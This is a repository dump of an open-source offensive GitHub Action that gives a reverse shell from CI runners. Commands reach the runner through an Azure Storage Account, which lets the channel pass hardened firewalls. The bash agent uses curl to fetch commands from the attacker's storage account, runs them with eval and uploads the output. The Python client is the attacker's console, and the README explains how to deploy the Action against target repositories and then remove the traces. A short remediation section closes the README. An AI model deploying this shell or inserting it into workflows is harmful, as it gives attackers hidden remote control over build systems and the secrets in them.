├── README.md
├── action.yml
├── agent.sh
├── client.py
└── resources
    ├── demo.png
    ├── diagram.png
    └── logo.jpg

/README.md:
--------------------------------------------------------------------------------

# Azure Storage Account Reverse Shell

![Logo](resources/logo.jpg)

## 🏁 What this is and major use cases

This is a GitHub Action that can send a reverse shell from a GitHub runner to any internet-connected device able to run Python, utilizing an Azure Storage Account as a broker - bypassing firewall rules in place on self-hosted runners.

This comes in handy in two cases:

1. 🐱‍👤 **Red Team Exercise:**
    * All outgoing and "incoming" connections from the runner are made to `*.blob.core.windows.net`, so a high level of scrutiny is needed to detect this.
    * However, you might not want to use this action directly, but rather adapt the code into your own ;)
2. 💻 **Attacking self-hosted runners:**
    * Self-hosted runners should be hardened and not allow any outgoing connections beyond the minimum required by the GitHub documentation.
    * The endpoint `*.blob.core.windows.net` has to be whitelisted even for firewall-protected self-hosted runners, since GitHub uses Azure Storage Accounts for writing job summaries, logs, workflow artifacts, and caches (see [documentation](https://docs.github.com/en/actions/hosting-your-own-runners/managing-self-hosted-runners/about-self-hosted-runners#communication-between-self-hosted-runners-and-github)).
    * This is especially interesting for non-ephemeral runners, if you want to debug other workflow runs, too.

And this is what an incoming shell looks like:

![demo](resources/demo.png)

## How to use it

### Set up the Azure Storage Account

This is straightforward: you will need a resource group, a Storage Account within it, and a container within that Storage Account.
Note down the names of the last two:

``` bash
az group create \
  --name <resource-group-name> \
  --location <location>

az storage account create \
  --resource-group <resource-group-name> \
  --name <storage-account-name> \
  --location <location> \
  --sku Standard_LRS

az storage container create \
  --account-name <storage-account-name> \
  --name <container-name>
```

Now generate a SAS token that will allow listing, reading, writing and deleting blobs for a limited time. This command will generate one that is valid for 30 minutes:

``` bash
az storage container generate-sas \
  --account-name <storage-account-name> \
  --name <container-name> \
  --permissions lrdw \
  --expiry $(date -u -d "+30 minutes" +"%Y-%m-%dT%H:%M:%SZ")
```

### Set up your client

> 💡 It is currently important to start the script before you trigger the reverse shell, since the script will only utilize the first session that comes in after it has started.

Set the values for the Storage Account, the container and the SAS token as environment variables:

``` bash
export AZ_STORAGE_ACCOUNT_NAME=<storage-account-name>
export AZ_STORAGE_CONTAINER_NAME=<container-name>
export AZ_STORAGE_SAS_TOKEN=<sas-token>
```

Then run the client - it will query the Storage Account for an incoming shell every second:

``` bash
python3 client.py
```

### Set up (and trigger) the reverse shell

Include the following in your target repo under `.github/workflows/<workflow-name>.yml` - the example is triggered by `workflow_dispatch`, but use `push` or whatever fits the bill.
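Before committing the workflow, you can sanity-check the SAS token from any machine. This is a minimal sketch that assumes the three environment variables from the previous section are already exported; it simply issues the same container listing request the agent and client use internally:

``` bash
# Build the container listing URL from the exported variables.
LIST_URL="https://${AZ_STORAGE_ACCOUNT_NAME}.blob.core.windows.net/${AZ_STORAGE_CONTAINER_NAME}?restype=container&comp=list&${AZ_STORAGE_SAS_TOKEN}"

# An XML <EnumerationResults> document in the response means the token is
# valid and carries the "l" (list) permission; an error document means it
# is expired, malformed, or lacks permissions.
curl -s "$LIST_URL" || echo "request failed - check network, names and token"
```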

``` yml
on:
  workflow_dispatch:

jobs:
  exfil:
    runs-on: ubuntu-latest
    name: This will send a reverse shell via Azure Storage Account
    steps:
      - uses: offensive-actions/azure-storage-reverse-shell@<version>
        with:
          az-storage-account-name: '<storage-account-name>'
          az-storage-container-name: '<container-name>'
          az-storage-sas-token: '<sas-token>'
```

### When you are done

**Ending the session from the agent's side:** by default, the reverse shell times out after 2 minutes of inactivity. This behaviour can be tuned by setting `retry-interval` (default: `2` seconds) and `max-retries` (default: `60`) in `.github/workflows/<workflow-name>.yml`.

**Ending the session from the client's side:** just type `exit` - the script will let the agent know and then terminate.

**Invalidate credentials:** you ~~can~~ should rotate the Storage Account keys to invalidate the SAS tokens generated earlier:

``` bash
az storage account keys renew \
  --account-name <storage-account-name> \
  --key key1

az storage account keys renew \
  --account-name <storage-account-name> \
  --key key2
```

**Housekeeping:** if needed:

* purge the GitHub Action history
* delete the workflow definition from the target repository
* delete the container, Storage Account and resource group

## How it works

* When the GitHub Action is executed on the target runner, it gathers information about the context it is running in and formats it as a prompt: `whoami@hostname:pwd$`.
* It then writes this to a blob in the Azure Storage Account, using the current Unix timestamp as a prefix.
* On the attacker's side, a client script regularly polls for new blobs - and as soon as it finds one, it loads it and prints its contents in the form of a terminal prompt.
* Then, every command entered at this prompt is written to a new blob in the Storage Account, again using the same Unix timestamp as prefix.
* On the runner, the Action also polls for new blobs, loads their content (the commands from the client script), and writes the results back to the Storage Account.
* The client, polling for new blobs, receives the results and prints them.

![diagram](resources/diagram.png)

> ❗ This reverse shell is, due to its nature, not fully interactive. Thus, you will lose the shell if you send a command that requires interactive input.
> An example: if you send `sudo -l` and a password is needed, you cannot enter it.
> Currently, this bricks the Action run, and depending on the runner in use, the process may live for a long time.

## Why I do this

1. Because it's fun.
2. To learn stuff (see point 1).
3. Because I hope you might find this fun, too, and reach out with pull requests, comments, feature requests, etc.

## Remediation

> This is not an endorsement and not sponsored; I just learned about this in a discussion on LinkedIn with the co-founder of [StepSecurity](https://www.stepsecurity.io/), and it deserves some credit 💯.

When a job run starts, one can actually detect which Storage Account will be used for caching. All egress traffic to other Storage Accounts can then be blocked.
There are different tools out there to harden GitHub-hosted and self-hosted runners, and several of them might already include this function.

Here is an example of a malicious workflow run that was stopped: [https://github.com/step-security/github-actions-goat/actions/runs/11038173335/workflow](https://github.com/step-security/github-actions-goat/actions/runs/11038173335/workflow), make sure to check the build logs!

## Currently planned next steps

1. If the timeout hits on GitHub's side, the agent should send that information to the Storage Account, and the client should pick up on it.
2. The client should list all currently available shells instead of just showing the first one that comes in after client start.
3. The agent should implement a timeout for executed commands, in case e.g. an interactive command has accidentally been sent. If the timeout is hit, the agent should communicate that and resume operations.
4. The whole interaction should get logged into a file for compliance.
5. Test on Windows and macOS runners - currently it is untested there.

--------------------------------------------------------------------------------
/action.yml:
--------------------------------------------------------------------------------

name: 'Reverse Shell'
description: 'This sends a reverse shell via Azure Storage Account to circumvent hardened firewall rules for self-hosted runners.'

inputs:
  az-storage-account-name:
    description: 'The Azure Storage Account to send data to'
    required: true
  az-storage-container-name:
    description: 'The name of the Azure Storage Account container to send data to'
    required: true
  az-storage-sas-token:
    description: 'The SAS token for the Azure Storage Account container'
    required: true
  retry-interval:
    description: 'How often, in seconds, the action polls the storage account for new commands'
    required: false
    default: 2
  max-retries:
    description: 'How many times the action will check for new commands in the storage account before terminating the reverse shell'
    required: false
    default: 60

runs:
  using: "composite"
  steps:
    - name: 'Setup reverse shell via Azure Storage Account container'
      shell: bash
      run: bash ${{ github.action_path }}/agent.sh
      env:
        AZ_STORAGE_ACCOUNT_NAME: ${{ inputs.az-storage-account-name }}
        AZ_STORAGE_CONTAINER_NAME: ${{ inputs.az-storage-container-name }}
        AZ_STORAGE_SAS_TOKEN: ${{ inputs.az-storage-sas-token }}
        RETRY_INTERVAL: ${{ inputs.retry-interval }}
        MAX_RETRIES: ${{ inputs.max-retries }}

--------------------------------------------------------------------------------
/agent.sh:
--------------------------------------------------------------------------------

#!/bin/bash

# Define variables, here set via action.yml
#AZ_STORAGE_ACCOUNT_NAME=""   # Replace with your storage account name
#AZ_STORAGE_CONTAINER_NAME="" # Replace with your container name
#AZ_STORAGE_SAS_TOKEN=""      # Replace with your SAS token
#RETRY_INTERVAL=2             # Time in seconds between retries
#MAX_RETRIES=60               # Maximum retries without finding a new command to execute

# Save the current time in Unix format
UNIX_TIMESTAMP=$(date +%s)

# Function to download a blob
download_blob() {
  local blob_url="https://${AZ_STORAGE_ACCOUNT_NAME}.blob.core.windows.net/${AZ_STORAGE_CONTAINER_NAME}/${COMMAND_BLOB_NAME}?${AZ_STORAGE_SAS_TOKEN}"
  curl -s -o "command.txt" "$blob_url"
}

# Function to upload a blob
upload_blob() {
  local blob_url="https://${AZ_STORAGE_ACCOUNT_NAME}.blob.core.windows.net/${AZ_STORAGE_CONTAINER_NAME}/${RESULT_BLOB_NAME}?${AZ_STORAGE_SAS_TOKEN}"
  curl -s -X PUT \
    -H "x-ms-blob-type: BlockBlob" \
    -d "$(cat result.txt)" \
    "$blob_url"
}

# Function to get the latest counter for a given timestamp
get_latest_counter() {
  local timestamp=$1
  local latest_counter=0
  local blob_prefix="${timestamp}-"
  local blob_suffix="-command"

  # List all blobs and extract their names from the <Name> elements of the XML listing
  blob_list=$(curl -s "https://${AZ_STORAGE_ACCOUNT_NAME}.blob.core.windows.net/${AZ_STORAGE_CONTAINER_NAME}?restype=container&comp=list&${AZ_STORAGE_SAS_TOKEN}" | grep -oP "(?<=<Name>).*?(?=</Name>)")

  for blob in $blob_list; do
    if [[ $blob == ${blob_prefix}* && $blob == *${blob_suffix} ]]; then
      counter=$(echo "$blob" | cut -d'-' -f2)
      if [[ $counter =~ ^[0-9]+$ ]] && (( counter > latest_counter )); then
        latest_counter=$counter
      fi
    fi
  done

  echo "$latest_counter"
}

# Step 1: Save the initial result to a blob with counter 0
RESULT_BLOB_NAME="${UNIX_TIMESTAMP}-0-result"
echo "$(whoami)@$(hostname):~$(pwd)$ " > result.txt
upload_blob

# Initialize the last processed counter and the retry counter
LAST_PROCESSED_COUNTER=0
ATTEMPT=0

# Monitor for and process new commands
while : ; do
  # Get the latest counter for the current timestamp
  LATEST_COUNTER=$(get_latest_counter "$UNIX_TIMESTAMP")

  # Check if there is a new blob to process
  if [ "$LATEST_COUNTER" -gt "$LAST_PROCESSED_COUNTER" ]; then

    ATTEMPT=0
    COMMAND_BLOB_NAME="${UNIX_TIMESTAMP}-${LATEST_COUNTER}-command"
    RESULT_BLOB_NAME="${UNIX_TIMESTAMP}-${LATEST_COUNTER}-result"

    # Get the blob, read the command and execute it. Stop the shell if "exit" is received.
    download_blob
    COMMAND=$(cat command.txt)
    if [ "$COMMAND" = "exit" ]; then
      exit 0
    else
      RESULT=$(eval "$COMMAND")
    fi

    # Write the result back to the storage account
    echo "$RESULT" > result.txt
    upload_blob

    # Clean up
    rm command.txt result.txt

    # Update the last processed counter
    LAST_PROCESSED_COUNTER=$LATEST_COUNTER
  else
    # Count tries without new commands and stop trying after the given number of retries
    ATTEMPT=$((ATTEMPT + 1))
    if [ "$ATTEMPT" -eq "$MAX_RETRIES" ]; then
      exit 0
    fi
  fi

  # Wait before checking again
  sleep "$RETRY_INTERVAL"
done

--------------------------------------------------------------------------------
/client.py:
--------------------------------------------------------------------------------

import os
import requests
import time
import re
import sys

# ANSI escape codes for colors
BLUE = '\033[34m'
GREEN = '\033[32m'
RESET = '\033[0m'

def get_env_or_prompt(var_name, prompt_message):
    """
    Retrieve an environment variable or prompt the user for the value if it is not set.
    """
    value = os.getenv(var_name)
    if value is None:
        value = input(prompt_message)
    if not value:
        raise ValueError(f"The value for {var_name} cannot be empty.")
    return value

def initialize_azure_storage_credentials():
    """
    Initialize Azure Storage credentials either from environment variables or user input.
    """
    global account_name, container_name, sas_token

    account_name = get_env_or_prompt('AZ_STORAGE_ACCOUNT_NAME', 'Enter Azure Storage Account Name: ')
    container_name = get_env_or_prompt('AZ_STORAGE_CONTAINER_NAME', 'Enter Azure Storage Container Name: ')
    sas_token = get_env_or_prompt('AZ_STORAGE_SAS_TOKEN', 'Enter Azure Storage SAS Token: ')

def list_blobs():
    """
    List all blob names in the container.
    """
    list_blobs_url = f"https://{account_name}.blob.core.windows.net/{container_name}?restype=container&comp=list&{sas_token}"

    try:
        response = requests.get(list_blobs_url)
        response.raise_for_status()
        # Blob names are returned inside <Name> elements of the XML listing
        blobs = re.findall(r'<Name>([^<]+)</Name>', response.text)
        return blobs
    except requests.RequestException as e:
        raise Exception(f"An error occurred while listing blobs: {e}")

def monitor_for_new_connection(start_blobs):
    """
    Monitor the container for a new blob that matches the naming schema and indicates a new incoming connection.
    """
    known_blobs = set(start_blobs)

    while True:
        blobs = list_blobs()
        new_blobs = set(blobs) - known_blobs
        if new_blobs:
            for blob in new_blobs:
                match = re.match(r'^(\d+)-0-result$', blob)
                if match:
                    timestamp = match.group(1)
                    print(f"\nIncoming connection with timestamp: {timestamp}.")
                    return timestamp

        # Print "." on the same line to indicate waiting
        sys.stdout.write(".")
        sys.stdout.flush()
        time.sleep(1)

def get_blob_contents(blob_name):
    """
    Download the contents of the blob with the given name.
    """
    blob_url = f"https://{account_name}.blob.core.windows.net/{container_name}/{blob_name}?{sas_token}"

    try:
        response = requests.get(blob_url)
        response.raise_for_status()
        return response.text.strip()
    except requests.RequestException as e:
        raise Exception(f"An error occurred while fetching the blob {blob_name}: {e}")

def upload_blob(content, blob_name):
    """
    Upload the content to a new blob with the given name.
    """
    blob_url = f"https://{account_name}.blob.core.windows.net/{container_name}/{blob_name}?{sas_token}"

    headers = {
        "x-ms-blob-type": "BlockBlob"
    }

    try:
        response = requests.put(blob_url, headers=headers, data=content)
        response.raise_for_status()
    except requests.RequestException as e:
        raise Exception(f"An error occurred while uploading the blob {blob_name}: {e}")

def get_prompt():
    """
    Get the prompt from the blob and apply color formatting.
    """
    # Get the prompt from the blob
    prompt_blob = f"{connection_start_timestamp}-0-result"
    prompt_format = get_blob_contents(prompt_blob)

    # Add color formatting
    try:
        # Assuming the format is something like "user@host:~/path$ "
        user_and_host, rest_of_prompt = prompt_format.split(':~', 1)
        working_directory = rest_of_prompt

        prompt = (
            f"{BLUE}{user_and_host}{RESET}:~"
            f"{GREEN}{working_directory}{RESET} "
        )
    except ValueError:
        # If the format doesn't match, fall back to no color formatting
        prompt = prompt_format

    return prompt

def main():
    global connection_start_timestamp
    global connection_prompt

    initialize_azure_storage_credentials()

    # Initial retrieval of blobs
    start_blobs = list_blobs()

    # Monitor for new blob and get the timestamp
    connection_start_timestamp = monitor_for_new_connection(start_blobs)

    # Compute the prompt once
    connection_prompt = get_prompt()

    # Initialize command number
    command_number = 1

    while True:

        # Display the prompt
        user_input = input(connection_prompt)

        # Upload the command blob
        command_blob_name = f"{connection_start_timestamp}-{command_number}-command"
        upload_blob(user_input, command_blob_name)

        # Handle exit command
        if user_input.strip().lower() == 'exit':
            break

        # Monitor for the result blob
        while True:
            result_blob_name = f"{connection_start_timestamp}-{command_number}-result"
            blobs = list_blobs()
            if result_blob_name in blobs:
                result_content = get_blob_contents(result_blob_name)
                print(result_content, end='\n\n')
                break
            # Avoid hammering the storage account while waiting
            time.sleep(1)

        # Increment command number for the next command
        command_number += 1

    print("Exiting...")

if __name__ == "__main__":
    main()

--------------------------------------------------------------------------------
/resources/demo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/offensive-actions/azure-storage-reverse-shell/555520241eb24889e9e35280c666246151496769/resources/demo.png

--------------------------------------------------------------------------------
/resources/diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/offensive-actions/azure-storage-reverse-shell/555520241eb24889e9e35280c666246151496769/resources/diagram.png

--------------------------------------------------------------------------------
/resources/logo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/offensive-actions/azure-storage-reverse-shell/555520241eb24889e9e35280c666246151496769/resources/logo.jpg
--------------------------------------------------------------------------------